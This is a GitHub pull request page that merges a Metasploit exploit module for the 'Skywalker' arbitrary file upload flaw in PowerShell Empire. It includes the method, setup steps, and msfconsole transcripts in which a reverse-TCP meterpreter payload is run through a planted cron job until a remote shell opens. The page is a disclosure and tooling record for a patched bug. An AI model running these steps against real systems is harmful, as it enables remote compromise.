New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PowerShellEmpire Arbitrary File Upload (Skywalker) #7450

Merged
merged 3 commits into from Nov 17, 2016

Conversation

Projects
None yet
6 participants
@wolfthefallen
Contributor

wolfthefallen commented Oct 17, 2016

This PR adds an exploit module that leverages the arbitrary file upload
vulnerability in PowershellEmpire dubbed "Skywalker". Versions prior to f030cf62
are vulnerable.

The module recovers the staging key by XORing specific offsets from the
powershell stage file which contain punctuation. Using punctuation characters
is necessary due to how Empire obfuscates the plaintext stage by shuffeling the
case of alphabetic characters. Once the staging key has been recovered the
module negotiates an RSA key to simulate an agent connecting. Once a fake agent
is negotiated, the malicious agent crafts and sends a response to a DOWNLOAD
task which leverages the traversal flaw allowing a file to be written to the
filesystem with the privileges of the Empire user.

Blog referance the vulnerability is live.

Verification

Empire Setup

  • Clone https://github.com/adaptivethreat/Empire.git
  • Checkout commit 03ca7bdb (the last unpatched commit)
  • Run through the setup with setup/install.sh
  • Start Empire as root
  • Start a listener

Exploitation

  • Start msfconsole
  • use exploit/linux/http/empire_skywalker
  • Set the options appropriately and set VERBOSE to true
  • Verify that the staging key is recovered (only printed when VERBSE is true)
  • After a minute a session should be opened

Example Output

sysmsf > use exploit/linux/http/empire_skywalker
msf exploit(empire_skywalker) > set RHOST 172.20.220.182
RHOST => 172.20.220.182
msf exploit(empire_skywalker) > set RPORT 80
RPORT => 80
msf exploit(empire_skywalker) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf exploit(empire_skywalker) > set LHOST 172.20.220.182
LHOST => 172.20.220.182
msf exploit(empire_skywalker) > check
[*] 172.20.220.182:80 The target appears to be vulnerable.
msf exploit(empire_skywalker) > set verbose TRUE
verbose => true
msf exploit(empire_skywalker) > exploit

[*] Started reverse TCP handler on 172.20.220.182:4444
[*] Recovering the staging key...
[*] Successfully recovered the staging key: 28:2e:49:42:56:74:5a:76:6b:7e:29:2a:60:50:54:40:65:5d:77:2f:6e:37:35:6d:78:4f:34:72:66:3d:2d:62
[*] Successfully sent the RSA key
[*] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/ooJpUCid
[*] Writing cron job to /etc/cron.d/inqIBwaE
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38289 bytes) to 172.20.220.182
[+] Deleted /etc/cron.d/inqIBwaE
[+] Deleted /tmp/ooJpUCid
[+] Deleted /agent.log

meterpreter > sysinfo
Computer     : fwsb
OS           : Linux 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016
Architecture : x86_64
Meterpreter  : python/linux
meterpreter >

CC: @HarmJ0y @zeroSteiner

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 17, 2016

Contributor

Nice work, gents. I assume this requires root due to the /etc/cron.d write.

Contributor

wvu-r7 commented Oct 17, 2016

Nice work, gents. I assume this requires root due to the /etc/cron.d write.

@wolfthefallen

This comment has been minimized.

Show comment
Hide comment
@wolfthefallen

wolfthefallen Oct 17, 2016

Contributor

Yes for this exploit to work Empire will have to be running as root. Most of the use cases for Empire require it to run as root for port binding and other functions, So there is a high probability of this exploit working against un-patched versions.

If the Empire instance is not running as root, The Arbitrary File Write vulnerability still exists but only has write permissions of that of the user level that it is running as.

Contributor

wolfthefallen commented Oct 17, 2016

Yes for this exploit to work Empire will have to be running as root. Most of the use cases for Empire require it to run as root for port binding and other functions, So there is a high probability of this exploit working against un-patched versions.

If the Empire instance is not running as root, The Arbitrary File Write vulnerability still exists but only has write permissions of that of the user level that it is running as.

@justinsteven

This comment has been minimized.

Show comment
Hide comment
@justinsteven

justinsteven Oct 18, 2016

Contributor

STAGE0_URI and STAGE1_URI can be configured by the Empire admin. The module bakes in sensible values for each as per setup_database.py that ships with Empire, but these should probably be lifted into the Datastore (with sensible defaults as per setup_database.py) so the user can modify them if they know the values that the Empire admin has set them to (just as what's been done for PROFILE)

Contributor

justinsteven commented Oct 18, 2016

STAGE0_URI and STAGE1_URI can be configured by the Empire admin. The module bakes in sensible values for each as per setup_database.py that ships with Empire, but these should probably be lifted into the Datastore (with sensible defaults as per setup_database.py) so the user can modify them if they know the values that the Empire admin has set them to (just as what's been done for PROFILE)

@HarmJ0y

This comment has been minimized.

Show comment
Hide comment
@HarmJ0y

HarmJ0y Oct 18, 2016

FYI the post with details is now live, and the issue was fixed 30 days ago shortly after @zeroSteiner's disclosure.

HarmJ0y commented Oct 18, 2016

FYI the post with details is now live, and the issue was fixed 30 days ago shortly after @zeroSteiner's disclosure.

@wolfthefallen wolfthefallen changed the title from EmpirePowerShell Arbitrary File Upload (Skywalker) to PowerShellEmpire Arbitrary File Upload (Skywalker) Nov 13, 2016

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2016

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Nov 17, 2016

Contributor

Works for me:

[*] Reloading module...

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Recovering the staging key...
[*] Successfully recovered the staging key: 37:63:64:38:61:35:62:64:37:38:62:34:35:35:61:35:65:31:38:61:66:65:62:63:31:65:66:65:30:30:65:35
[*] Successfully sent the RSA key
[*] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/SJaIENpY
[*] Writing cron job to /etc/cron.d/ApTWJOvD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38289 bytes) to 192.168.146.183
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.183:58850) at 2016-11-17 17:40:01 -0600
[+] Deleted /etc/cron.d/ApTWJOvD
[+] Deleted /tmp/SJaIENpY
[+] Deleted /agent.log

meterpreter > 
Contributor

wchen-r7 commented Nov 17, 2016

Works for me:

[*] Reloading module...

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Recovering the staging key...
[*] Successfully recovered the staging key: 37:63:64:38:61:35:62:64:37:38:62:34:35:35:61:35:65:31:38:61:66:65:62:63:31:65:66:65:30:30:65:35
[*] Successfully sent the RSA key
[*] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/SJaIENpY
[*] Writing cron job to /etc/cron.d/ApTWJOvD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38289 bytes) to 192.168.146.183
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.183:58850) at 2016-11-17 17:40:01 -0600
[+] Deleted /etc/cron.d/ApTWJOvD
[+] Deleted /tmp/SJaIENpY
[+] Deleted /agent.log

meterpreter > 
@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Nov 17, 2016

Contributor

Yeah, I'll land it.

Contributor

wchen-r7 commented Nov 17, 2016

Yeah, I'll land it.

@wchen-r7 wchen-r7 merged commit 684feb6 into rapid7:master Nov 17, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Nov 17, 2016

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Nov 17, 2016

Contributor

Release Notes

This module exploits a vulnerability in PowerShellEmpire. By recovering the staging key, the module is able to communicate using a malicious agent, and triggers a download task that leverages a traversal vulnerability in order to write to an arbitrary location, which results in remote code execution.

Contributor

wchen-r7 commented Nov 17, 2016

Release Notes

This module exploits a vulnerability in PowerShellEmpire. By recovering the staging key, the module is able to communicate using a malicious agent, and triggers a download task that leverages a traversal vulnerability in order to write to an arbitrary location, which results in remote code execution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment